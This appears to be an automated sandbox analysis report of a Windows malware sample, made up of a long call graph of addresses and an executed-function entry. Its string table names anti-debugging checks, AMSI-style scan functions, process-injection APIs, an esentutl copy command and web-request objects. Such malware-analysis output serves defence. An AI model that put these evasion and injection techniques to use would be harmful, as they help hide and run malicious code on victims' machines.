11 API calls 36505->36508 36511 2ed89d0 20 API calls 36507->36511 36510 2ee5680 36508->36510 36516 2ee5698 36510->36516 36513 2ee3ba6 36511->36513 36514 2ec4860 11 API calls 36513->36514 36520 2ee3bc7 36514->36520 36518 2ed89d0 20 API calls 36516->36518 36521 2ee56a4 36518->36521 36523 2ec47ec 11 API calls 36520->36523 36522 2ec4860 11 API calls 36521->36522 36524 2ee56c5 36522->36524 36531 2ee3bfe 36523->36531 36526 2ee56d0 36524->36526 36529 2ee56dd 36526->36529 36533 2ec47ec 11 API calls 36529->36533 36534 2ed89d0 20 API calls 36531->36534 36535 2ee56fc 36533->36535 36537 2ee3c22 36534->36537 36539 2ee5714 36535->36539 36538 2ec4860 11 API calls 36537->36538 36545 2ee3c43 36538->36545 36543 2ed89d0 20 API calls 36539->36543 36546 2ee5720 36543->36546 36548 2ec47ec 11 API calls 36545->36548 37778 2ede398 36546->37778 36557 2ee3c7a 36548->36557 36551 2ec4530 11 API calls 36553 2ee5746 36551->36553 36555 2ec4860 11 API calls 36553->36555 36562 2ee5767 36555->36562 36560 2ed89d0 20 API calls 36557->36560 36567 2ee3c9e 36560->36567 36564 2ec47ec 11 API calls 36562->36564 36572 2ee579e 36564->36572 38228 2ec7990 11 API calls 36567->38228 36571 2ee3cd3 36576 2ec4860 11 API calls 36571->36576 36574 2ed89d0 20 API calls 36572->36574 36577 2ee57c2 36574->36577 36582 2ee3d2a 36576->36582 36579 2ec4860 11 API calls 36577->36579 36584 2ee57e3 36579->36584 36585 2ec47ec 11 API calls 36582->36585 36587 2ec47ec 11 API calls 36584->36587 36590 2ee3d61 36585->36590 36591 2ee581a 36587->36591 36592 2ed89d0 20 API calls 36590->36592 36595 2ed89d0 20 API calls 36591->36595 36594 2ee3d85 36592->36594 36597 2ec4860 11 API calls 36594->36597 36598 2ee583e 36595->36598 36604 2ee3dcb 36597->36604 36600 2ec7acc 42 API calls 36598->36600 36601 2ee5848 36600->36601 36603 2edf16c 11 API calls 36601->36603 36605 2ee585a 36603->36605 37773 2ed4dd4 36604->37773 36606 2ec4530 11 API calls 36605->36606 36607 2ee586a 36606->36607 36608 2ec4860 11 API calls 36607->36608 36611 2ee588b 36608->36611 36610 2ee3df3 36610->35282 36613 2ec47ec 11 API calls 36611->36613 36617 2ee58c2 36613->36617 36619 2ed89d0 20 API calls 36617->36619 36621 2ee58e6 36619->36621 36623 2ec4860 11 API calls 36621->36623 36626 2ee5907 36623->36626 36627 2ec47ec 11 API calls 36626->36627 36632 2ee593e 36627->36632 36634 2ed89d0 20 API calls 36632->36634 36636 2ee5962 36634->36636 36638 2ec4860 11 API calls 36636->36638 36641 2ee5983 36638->36641 36644 2ec47ec 11 API calls 36641->36644 36646 2ee59ba 36644->36646 36649 2ed89d0 20 API calls 36646->36649 36651 2ee59de 36649->36651 36653 2ec4860 11 API calls 36651->36653 36655 2ee59ff 36653->36655 36658 2ec47ec 11 API calls 36655->36658 36660 2ee5a36 36658->36660 36662 2ed89d0 20 API calls 36660->36662 36665 2ee5a5a 36662->36665 36667 2edf094 11 API calls 36665->36667 36669 2ee5a6a 36667->36669 36670 2edf108 11 API calls 36669->36670 36671 2ee5a7b 36670->36671 36673 2ec4530 11 API calls 36671->36673 36674 2ee5a8b 36673->36674 36675 2ec4860 11 API calls 36674->36675 36676 2ee5aac 36675->36676 36677 2ec47ec 11 API calls 36676->36677 36678 2ee5ae3 36677->36678 36679 2ed89d0 20 API calls 36678->36679 36680 2ee5b07 36679->36680 36681 2ec4860 11 API calls 36680->36681 36682 2ee5b28 36681->36682 36683 2ec47ec 11 API calls 36682->36683 36684 2ee5b5f 36683->36684 36685 2ed89d0 20 API calls 36684->36685 36686 2ee5b83 36685->36686 36687 2ec4860 11 API calls 36686->36687 36688 2ee5ba4 36687->36688 36689 2ec47ec 11 API calls 36688->36689 36690 2ee5bdb 36689->36690 36691 2ed89d0 20 API calls 36690->36691 36692 2ee5bff 36691->36692 36693 2ec4860 11 API calls 36692->36693 36694 2ee5c20 36693->36694 36695 2ec47ec 11 API calls 36694->36695 36696 2ee5c57 36695->36696 36697 2ed89d0 20 API calls 36696->36697 36698 2ee5c7b 36697->36698 36699 2ec4860 11 API calls 36698->36699 36700 2ee5c9c 36699->36700 36701 2ec47ec 11 API calls 36700->36701 36702 2ee5cd3 36701->36702 36703 2ed89d0 20 API calls 36702->36703 36704 2ee5cf7 36703->36704 36705 2ec4860 11 API calls 36704->36705 36706 2ee5d18 36705->36706 36707 2ec47ec 11 API calls 36706->36707 36708 2ee5d4f 36707->36708 36709 2ed89d0 20 API calls 36708->36709 36711 2ee5d73 36709->36711 36710 2ee7568 36713 2ec4860 11 API calls 36710->36713 36711->36710 36712 2ec4860 11 API calls 36711->36712 36715 2ee5da8 36712->36715 36714 2ee7589 36713->36714 36716 2ec47ec 11 API calls 36714->36716 36717 2ec7e5c GetFileAttributesA 36715->36717 36721 2ee75c0 36716->36721 36718 2ee5dcb 36717->36718 36718->36710 36719 2ee5dd3 36718->36719 36720 2ec4860 11 API calls 36719->36720 36724 2ee5df4 36720->36724 36722 2ed89d0 20 API calls 36721->36722 36723 2ee75e4 36722->36723 36725 2ec4860 11 API calls 36723->36725 36726 2ec47ec 11 API calls 36724->36726 36727 2ee7605 36725->36727 36728 2ee5e2b 36726->36728 36729 2ec47ec 11 API calls 36727->36729 36730 2ed89d0 20 API calls 36728->36730 36733 2ee763c 36729->36733 36731 2ee5e4f 36730->36731 36732 2ec4860 11 API calls 36731->36732 36736 2ee5e70 36732->36736 36734 2ed89d0 20 API calls 36733->36734 36735 2ee7660 36734->36735 36737 2ec4860 11 API calls 36735->36737 36738 2ec47ec 11 API calls 36736->36738 36739 2ee7681 36737->36739 36740 2ee5ea7 36738->36740 36741 2ec47ec 11 API calls 36739->36741 36742 2ed89d0 20 API calls 36740->36742 36745 2ee76b8 36741->36745 36743 2ee5ecb 36742->36743 36744 2ec4860 11 API calls 36743->36744 36748 2ee5eec 36744->36748 36746 2ed89d0 20 API calls 36745->36746 36747 2ee76dc 36746->36747 36749 2ec4860 11 API calls 36747->36749 36750 2ec47ec 11 API calls 36748->36750 36751 2ee76fd 36749->36751 36752 2ee5f23 36750->36752 36753 2ec47ec 11 API calls 36751->36753 36754 2ed89d0 20 API calls 36752->36754 36757 2ee7734 36753->36757 36755 2ee5f47 36754->36755 36756 2ec4860 11 API calls 36755->36756 36760 2ee5f68 36756->36760 36758 2ed89d0 20 API calls 36757->36758 36759 2ee7758 36758->36759 36761 2ec4860 11 API calls 36759->36761 36762 2ec4860 11 API calls 36760->36762 36763 2ee7779 36761->36763 36764 2ee5fa0 36762->36764 36765 2ec47ec 11 API calls 36763->36765 36766 2ec47ec 11 API calls 36764->36766 36767 2ee77b0 36765->36767 36768 2ee5fd7 36766->36768 36769 2ed89d0 20 API calls 36767->36769 36771 2ed89d0 20 API calls 36768->36771 36770 2ee77d4 36769->36770 36774 2ee8318 36770->36774 36775 2ee77e9 36770->36775 36772 2ee5ffb 36771->36772 36773 2ec4860 11 API calls 36772->36773 36778 2ee601c 36773->36778 36777 2ec4860 11 API calls 36774->36777 36776 2ec4860 11 API calls 36775->36776 36780 2ee780a 36776->36780 36779 2ee8339 36777->36779 36781 2ec47ec 11 API calls 36778->36781 36782 2ec47ec 11 API calls 36779->36782 36783 2ec47ec 11 API calls 36780->36783 36784 2ee6053 36781->36784 36787 2ee8370 36782->36787 36785 2ee7841 36783->36785 36786 2ed89d0 20 API calls 36784->36786 36789 2ed89d0 20 API calls 36785->36789 36788 2ee6077 36786->36788 36791 2ed89d0 20 API calls 36787->36791 36790 2ec4860 11 API calls 36788->36790 36792 2ee7865 36789->36792 36796 2ee6098 36790->36796 36793 2ee8394 36791->36793 36794 2ec4860 11 API calls 36792->36794 36795 2ec4860 11 API calls 36793->36795 36798 2ee7886 36794->36798 36797 2ee83b5 36795->36797 36799 2ec47ec 11 API calls 36796->36799 36800 2ec47ec 11 API calls 36797->36800 36801 2ec47ec 11 API calls 36798->36801 36802 2ee60cf 36799->36802 36804 2ee83ec 36800->36804 36805 2ee78bd 36801->36805 36803 2ed89d0 20 API calls 36802->36803 36806 2ee60f3 36803->36806 36809 2ed89d0 20 API calls 36804->36809 36807 2ed89d0 20 API calls 36805->36807 36808 2ec4860 11 API calls 36806->36808 36810 2ee78e1 36807->36810 36814 2ee6114 36808->36814 36811 2ee8410 36809->36811 36812 2ec4860 11 API calls 36810->36812 36813 2ec4860 11 API calls 36811->36813 36815 2ee7902 36812->36815 36817 2ee8431 36813->36817 36816 2ec47ec 11 API calls 36814->36816 36819 2ec47ec 11 API calls 36815->36819 36820 2ee614b 36816->36820 36818 2ec47ec 11 API calls 36817->36818 36822 2ee8468 36818->36822 36823 2ee7939 36819->36823 36821 2ed89d0 20 API calls 36820->36821 36824 2ee616f 36821->36824 36826 2ed89d0 20 API calls 36822->36826 36827 2ed89d0 20 API calls 36823->36827 36825 2ec4860 11 API calls 36824->36825 36833 2ee61a9 36825->36833 36829 2ee848c 36826->36829 36828 2ee795d 36827->36828 36830 2ec47ec 11 API calls 36828->36830 36831 2ec4860 11 API calls 36829->36831 36832 2ee7975 36830->36832 36836 2ee84ad 36831->36836 36834 2ed85bc 18 API calls 36832->36834 36835 2ec4860 11 API calls 36833->36835 36837 2ee7986 36834->36837 36840 2ee61e1 36835->36840 36839 2ec47ec 11 API calls 36836->36839 36838 2ec4860 11 API calls 36837->36838 36842 2ee79a7 36838->36842 36841 2ee84e4 36839->36841 36843 2ec47ec 11 API calls 36840->36843 36844 2ed89d0 20 API calls 36841->36844 36845 2ec47ec 11 API calls 36842->36845 36847 2ee6218 36843->36847 36846 2ee8508 36844->36846 36848 2ee79de 36845->36848 36850 2ee851d 36846->36850 36851 2ee93a1 36846->36851 36849 2ed89d0 20 API calls 36847->36849 36855 2ed89d0 20 API calls 36848->36855 36852 2ee623c 36849->36852 36854 2ec4860 11 API calls 36850->36854 36853 2ec4860 11 API calls 36851->36853 36856 2ec4860 11 API calls 36852->36856 36860 2ee93c2 36853->36860 36857 2ee853e 36854->36857 36858 2ee7a02 36855->36858 36862 2ee625d 36856->36862 36861 2ee8556 36857->36861 36859 2ec4860 11 API calls 36858->36859 36866 2ee7a23 36859->36866 36864 2ec47ec 11 API calls 36860->36864 36863 2ec47ec 11 API calls 36861->36863 36867 2ec47ec 11 API calls 36862->36867 36865 2ee8575 36863->36865 36869 2ee93f9 36864->36869 36870 2ee858d 36865->36870 36868 2ec47ec 11 API calls 36866->36868 36871 2ee6294 36867->36871 36877 2ee7a5a 36868->36877 36872 2ed89d0 20 API calls 36869->36872 36873 2ed89d0 20 API calls 36870->36873 36874 2ed89d0 20 API calls 36871->36874 36875 2ee941d 36872->36875 36876 2ee8599 36873->36876 36878 2ee62b8 36874->36878 36879 2ec4860 11 API calls 36875->36879 36880 2ec4860 11 API calls 36876->36880 36881 2ed89d0 20 API calls 36877->36881 36882 2ec4860 11 API calls 36878->36882 36886 2ee943e 36879->36886 36883 2ee85ba 36880->36883 36884 2ee7a7e 36881->36884 36887 2ee62d9 36882->36887 36888 2ee85c5 36883->36888 36885 2ec4860 11 API calls 36884->36885 36891 2ee7a9f 36885->36891 36889 2ec47ec 11 API calls 36886->36889 36892 2ec47ec 11 API calls 36887->36892 36890 2ec47ec 11 API calls 36888->36890 36895 2ee9475 36889->36895 36893 2ee85f1 36890->36893 36894 2ec47ec 11 API calls 36891->36894 36897 2ee6310 36892->36897 36896 2ee85fc 36893->36896 36903 2ee7ad6 36894->36903 36898 2ed89d0 20 API calls 36895->36898 36899 2ed89d0 20 API calls 36896->36899 36900 2ed89d0 20 API calls 36897->36900 36901 2ee9499 36898->36901 36902 2ee8615 36899->36902 36904 2ee6334 36900->36904 36905 2ec4860 11 API calls 36901->36905 36906 2ec4860 11 API calls 36902->36906 36908 2ed89d0 20 API calls 36903->36908 36907 2ec4860 11 API calls 36904->36907 36909 2ee94ba 36905->36909 36910 2ee8636 36906->36910 36912 2ee6355 36907->36912 36911 2ee7afa 36908->36911 36913 2ec47ec 11 API calls 36909->36913 36914 2ec47ec 11 API calls 36910->36914 38231 2edadf8 29 API calls 36911->38231 36916 2ec47ec 11 API calls 36912->36916 36920 2ee94f1 36913->36920 36919 2ee866d 36914->36919 36921 2ee638c 36916->36921 36917 2ee7b21 36918 2ec4860 11 API calls 36917->36918 36925 2ee7b42 36918->36925 36922 2ed89d0 20 API calls 36919->36922 36923 2ed89d0 20 API calls 36920->36923 36926 2ed89d0 20 API calls 36921->36926 36924 2ee8691 36922->36924 36937 2ee9515 36923->36937 36927 2ec47ec 11 API calls 36924->36927 36931 2ec47ec 11 API calls 36925->36931 36928 2ee63b0 36926->36928 36930 2ee86bd 36927->36930 36929 2ec4860 11 API calls 36928->36929 36936 2ee63d1 36929->36936 36934 2ee86d5 36930->36934 36935 2ee7b79 36931->36935 36932 2ee9cf5 36933 2ec4860 11 API calls 36932->36933 36941 2ee9d16 36933->36941 36942 2ee86e0 CreateProcessAsUserW 36934->36942 36939 2ed89d0 20 API calls 36935->36939 36940 2ec47ec 11 API calls 36936->36940 36937->36932 36938 2ec4860 11 API calls 36937->36938 36950 2ee9560 36938->36950 36943 2ee7b9d 36939->36943 36952 2ee6408 36940->36952 36947 2ec47ec 11 API calls 36941->36947 36944 2ee876e 36942->36944 36945 2ee86f2 36942->36945 36946 2ec4860 11 API calls 36943->36946 36948 2ec4860 11 API calls 36944->36948 36949 2ec4860 11 API calls 36945->36949 36955 2ee7bbe 36946->36955 36957 2ee9d4d 36947->36957 36958 2ee878f 36948->36958 36951 2ee8713 36949->36951 36954 2ec47ec 11 API calls 36950->36954 36953 2ee871e 36951->36953 36956 2ed89d0 20 API calls 36952->36956 36962 2ec47ec 11 API calls 36953->36962 36965 2ee9597 36954->36965 36963 2ec47ec 11 API calls 36955->36963 36959 2ee642c 36956->36959 36960 2ed89d0 20 API calls 36957->36960 36961 2ec47ec 11 API calls 36958->36961 36964 2ec4860 11 API calls 36959->36964 36966 2ee9d71 36960->36966 36973 2ee87c6 36961->36973 36967 2ee874a 36962->36967 36974 2ee7bf5 36963->36974 36971 2ee644d 36964->36971 36969 2ed89d0 20 API calls 36965->36969 36968 2ec4860 11 API calls 36966->36968 36970 2ee8755 36967->36970 36978 2ee9d92 36968->36978 36972 2ee95bb 36969->36972 36980 2ed89d0 20 API calls 36970->36980 36977 2ec47ec 11 API calls 36971->36977 36975 2ec4860 11 API calls 36972->36975 36979 2ed89d0 20 API calls 36973->36979 36976 2ed89d0 20 API calls 36974->36976 36986 2ee95dc 36975->36986 36981 2ee7c19 36976->36981 36987 2ee6484 36977->36987 36984 2ec47ec 11 API calls 36978->36984 36982 2ee87ea 36979->36982 36980->36944 36983 2ec4860 11 API calls 36981->36983 36985 2ec4860 11 API calls 36982->36985 36989 2ee7c3a 36983->36989 36991 2ee9dc9 36984->36991 36992 2ee880b 36985->36992 36988 2ec47ec 11 API calls 36986->36988 36990 2ed89d0 20 API calls 36987->36990 37000 2ee9613 36988->37000 36994 2ec47ec 11 API calls 36989->36994 36993 2ee64a8 36990->36993 36996 2ed89d0 20 API calls 36991->36996 36997 2ec47ec 11 API calls 36992->36997 36995 2ec4860 11 API calls 36993->36995 37006 2ee7c71 36994->37006 36999 2ee64d5 36995->36999 36998 2ee9ded 36996->36998 37005 2ee8842 36997->37005 37001 2ec4860 11 API calls 36998->37001 37791 2ed85bc 36999->37791 37002 2ed89d0 20 API calls 37000->37002 37010 2ee9e0e 37001->37010 37004 2ee9637 37002->37004 37008 2ec4860 11 API calls 37004->37008 37012 2ed89d0 20 API calls 37006->37012 37016 2ee9658 37008->37016 37015 2ec47ec 11 API calls 37010->37015 37013 2ee7c95 37012->37013 37018 2ec4860 11 API calls 37013->37018 37023 2ee9e45 37015->37023 37021 2ec47ec 11 API calls 37016->37021 37025 2ee7cd5 37018->37025 37028 2ee968f 37021->37028 37026 2ed89d0 20 API calls 37023->37026 37029 2ec47ec 11 API calls 37025->37029 37032 2ee9e69 37026->37032 37031 2ed89d0 20 API calls 37028->37031 37035 2ee96b3 37031->37035 37036 2edf094 11 API calls 37035->37036 37703 2ec2eed 37702->37703 37704 2ec2ef8 GetTickCount 37702->37704 37703->35289 37704->35289 37706 2edf6fa GetProcAddress 37705->37706 37707 2edf711 37705->37707 37708 2edf709 37706->37708 37707->35361 37708->35361 37710 2edf786 37709->37710 37711 2edf760 GetProcAddress 37709->37711 37710->35362 37710->35366 37711->37710 37712 2edf774 CheckRemoteDebuggerPresent 37711->37712 37712->37710 37714 2ec49a4 37713->37714 37714->35385 37721 2ede114 37715->37721 37716 2ede197 37717 2ec44dc 11 API calls 37716->37717 37719 2ede19f 37717->37719 37718 2ec49f8 11 API calls 37718->37721 37720 2ec4530 11 API calls 37719->37720 37722 2ede1aa 37720->37722 37721->37716 37721->37718 37723 2ec4500 11 API calls 37722->37723 37724 2ede1c4 37723->37724 37724->35504 37726 2ec49a0 37725->37726 37727 2ec7e66 GetFileAttributesA 37726->37727 37728 2ec7e71 37727->37728 37728->35526 37728->35527 37730 2ec45cc 11 API calls 37729->37730 37731 2ecc38b 37730->37731 37731->35585 37733 2ec4de6 37732->37733 37733->37733 37735 2ec7adc 37734->37735 37736 2ec7afd 37735->37736 38237 2ec7660 42 API calls 37735->38237 37738 2edf16c 37736->37738 37743 2edf189 37738->37743 37739 2edf1e7 37740 2ec44dc 11 API calls 37739->37740 37742 2edf1fc 37740->37742 37744 2ec44dc 11 API calls 37742->37744 37743->37739 38238 2ec46c4 11 API calls 37743->38238 38239 2ec4530 11 API calls 37743->38239 37746 2edf204 37744->37746 37746->36068 37748 2ec4530 11 API calls 37747->37748 37749 2edf11c 37748->37749 37750 2edf163 37749->37750 37751 2ec49f8 11 API calls 37749->37751 37750->36115 37751->37749 37753 2ede265 37752->37753 37754 2ec4530 11 API calls 37753->37754 37755 2ede291 37754->37755 38240 2ec57d0 37755->38240 37757 2ede2b5 37758 2ede2d1 37757->37758 37759 2ec4a00 11 API calls 37757->37759 37761 2ede2e3 37757->37761 38243 2ec4a40 11 API calls 37757->38243 37760 2ec4530 11 API calls 37758->37760 37759->37757 37760->37761 37763 2ec4500 11 API calls 37761->37763 37764 2ede348 37763->37764 37765 2ec5818 37764->37765 37766 2ec581f 37765->37766 37768 2ec5839 37766->37768 38266 2ec57dc 13 API calls 37766->38266 37768->36181 37770 2ec49a0 37769->37770 37771 2ec7e8a GetFileAttributesA 37770->37771 37772 2ec7e95 37771->37772 37772->36319 37772->36320 38267 2ed5be8 37773->38267 37775 2ed4dee 38271 2ec7de0 WriteFile 37775->38271 37776 2ed4e09 37776->36610 37787 2ede3ba 37778->37787 37779 2ede45c 37780 2ec4bcc 11 API calls 37779->37780 37781 2ede471 37780->37781 37782 2ec4530 11 API calls 37781->37782 37784 2ede47c 37782->37784 37786 2ec44dc 11 API calls 37784->37786 37788 2ede491 37786->37788 37787->37779 38304 2ec46c4 11 API calls 37787->38304 38305 2ec4530 11 API calls 37787->38305 37789 2ec4500 11 API calls 37788->37789 37790 2ede49e 37789->37790 37790->36551 37792 2ec4530 11 API calls 37791->37792 37793 2ed85df 37792->37793 37794 2ec4860 11 API calls 37793->37794 37795 2ed85fe 37794->37795 37796 2ed81cc 17 API calls 37795->37796 38205 2ec4f20 SysAllocStringLen 38204->38205 38206 2eddd85 38205->38206 38207 2ec44dc 11 API calls 38206->38207 38208 2eddd9a 38207->38208 38209 2edddaa RtlDosPathNameToNtPathName_U 38208->38209 38351 2eddbdc 38209->38351 38211 2edddc6 NtOpenFile NtQueryInformationFile 38212 2ec4bcc 11 API calls 38211->38212 38213 2edde01 38212->38213 38214 2ec49f8 11 API calls 38213->38214 38215 2edde0d NtReadFile NtClose 38214->38215 38216 2edde37 38215->38216 38217 2ec4c60 SysFreeString 38216->38217 38218 2edde3f 38217->38218 38218->35726 38220 2ede1e6 38219->38220 38352 2ec8d94 38220->38352 38223 2ec44dc 11 API calls 38224 2ede239 38223->38224 38224->35842 38224->35843 38226 2ec4d7a 38225->38226 38227->36319 38228->36571 38231->36917 38237->37736 38238->37743 38239->37743 38244 2ec5644 38240->38244 38243->37757 38245 2ec5663 38244->38245 38250 2ec567d 38244->38250 38246 2ec566e 38245->38246 38261 2ec2cf4 11 API calls 38245->38261 38262 2ec563c 13 API calls 38246->38262 38249 2ec5678 38249->37757 38251 2ec56c6 38250->38251 38263 2ec2cf4 11 API calls 38250->38263 38253 2ec56d3 38251->38253 38254 2ec5708 38251->38254 38264 2ec2c44 11 API calls 38253->38264 38256 2ec2c10 11 API calls 38254->38256 38257 2ec5712 38256->38257 38258 2ec5703 38257->38258 38265 2ec5624 16 API calls 38257->38265 38258->38249 38260 2ec5644 16 API calls 38258->38260 38260->38258 38261->38246 38262->38249 38263->38251 38264->38258 38265->38258 38266->37768 38268 2ed5bf1 38267->38268 38273 2ed5c2c 38268->38273 38270 2ed5c0d 38270->37775 38272 2ec7dfd 38271->38272 38272->37776 38274 2ed5c47 38273->38274 38275 2ed5cec 38274->38275 38276 2ed5c6e 38274->38276 38300 2ec7d5c CreateFileA 38275->38300 38278 2ed5c87 CreateFileA 38276->38278 38279 2ed5c98 38278->38279 38280 2ed5ce5 38279->38280 38297 2ec7f98 12 API calls 38279->38297 38284 2ec4530 11 API calls 38280->38284 38281 2ed5cf6 38281->38280 38301 2ec7f98 12 API calls 38281->38301 38287 2ed5d59 38284->38287 38285 2ed5d11 GetLastError 38302 2eca778 12 API calls 38285->38302 38286 2ed5cac GetLastError 38298 2eca778 12 API calls 38286->38298 38292 2ec4500 11 API calls 38287->38292 38290 2ed5d28 38303 2ecb084 42 API calls 38290->38303 38291 2ed5cc3 38299 2ecb084 42 API calls 38291->38299 38295 2ed5d73 38292->38295 38295->38270 38296 2ed5d4a 38296->38280 38297->38286 38298->38291 38299->38280 38300->38281 38301->38285 38302->38290 38303->38296 38304->37787 38305->37787 38351->38211 38353 2ec8da1 38352->38353 38354 2ec8dc7 38353->38354 38356 2ec7660 42 API calls 38353->38356 38354->38223 38356->38354

                                                                                                                Executed Functions

                                                                                                                Function 02EDF7C8 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InetIsOffline.URL(00000000,00000000,02EEB784,?,?,?,00000000,00000000), ref: 02EDF801
                                                                                                                  • Part of subcall function 02ED89D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02F4738C,Function_0000662C,00000004,02F4739C,02F4738C,05F5E103,00000040,02F473A0,74F60000,00000000,00000000), ref: 02ED8AAA
                                                                                                                  • Part of subcall function 02EDF6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02EDFAEB,UacInitialize,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,Initialize), ref: 02EDF6EE
                                                                                                                  • Part of subcall function 02EDF6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02EDF700
                                                                                                                  • Part of subcall function 02EDF744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02EDF754
                                                                                                                  • Part of subcall function 02EDF744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02EDF766
                                                                                                                  • Part of subcall function 02EDF744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02EDF77D
                                                                                                                  • Part of subcall function 02EC7E5C: GetFileAttributesA.KERNEL32(00000000,?,02EE041F,ScanString,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,UacInitialize), ref: 02EC7E67
                                                                                                                  • Part of subcall function 02ECC364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0303B8B8,?,02EE0751,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,OpenSession), ref: 02ECC37B
                                                                                                                  • Part of subcall function 02EDDD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02EDDE40), ref: 02EDDDAB
                                                                                                                  • Part of subcall function 02EDDD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02EDDE40), ref: 02EDDDDB
                                                                                                                  • Part of subcall function 02EDDD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02EDDDF0
                                                                                                                  • Part of subcall function 02EDDD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02EDDE1C
                                                                                                                  • Part of subcall function 02EDDD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02EDDE25
                                                                                                                  • Part of subcall function 02EC7E80: GetFileAttributesA.KERNEL32(00000000,?,02EE356F,ScanString,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,Initialize), ref: 02EC7E8B
                                                                                                                  • Part of subcall function 02EC8048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02EE370D,OpenSession,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,Initialize,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8), ref: 02EC8055
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                                • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                • API String ID: 297057983-2644593349
                                                                                                                • Opcode ID: bf36680a6ae3f62f36893a674fe0f2a5aca8bc8f52dc34412fa977f01a3f40d1
                                                                                                                • Instruction ID: 7d20f37c917158f851bfa66a2726ccbdd513986d9f53f69146df7b4435e22cf6
                                                                                                                • Opcode Fuzzy Hash: bf36680a6ae3f62f36893a674fe0f2a5aca8bc8f52dc34412fa977f01a3f40d1
                                                                                                                • Instruction Fuzzy Hash: B3140D35A8011D8BDB11FBA4DD91ACE73FAFB85304F60E1A9F4099B654DA30AE52CF41
                                                                                                                Function 02ED8D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                                                Download Yara Rule

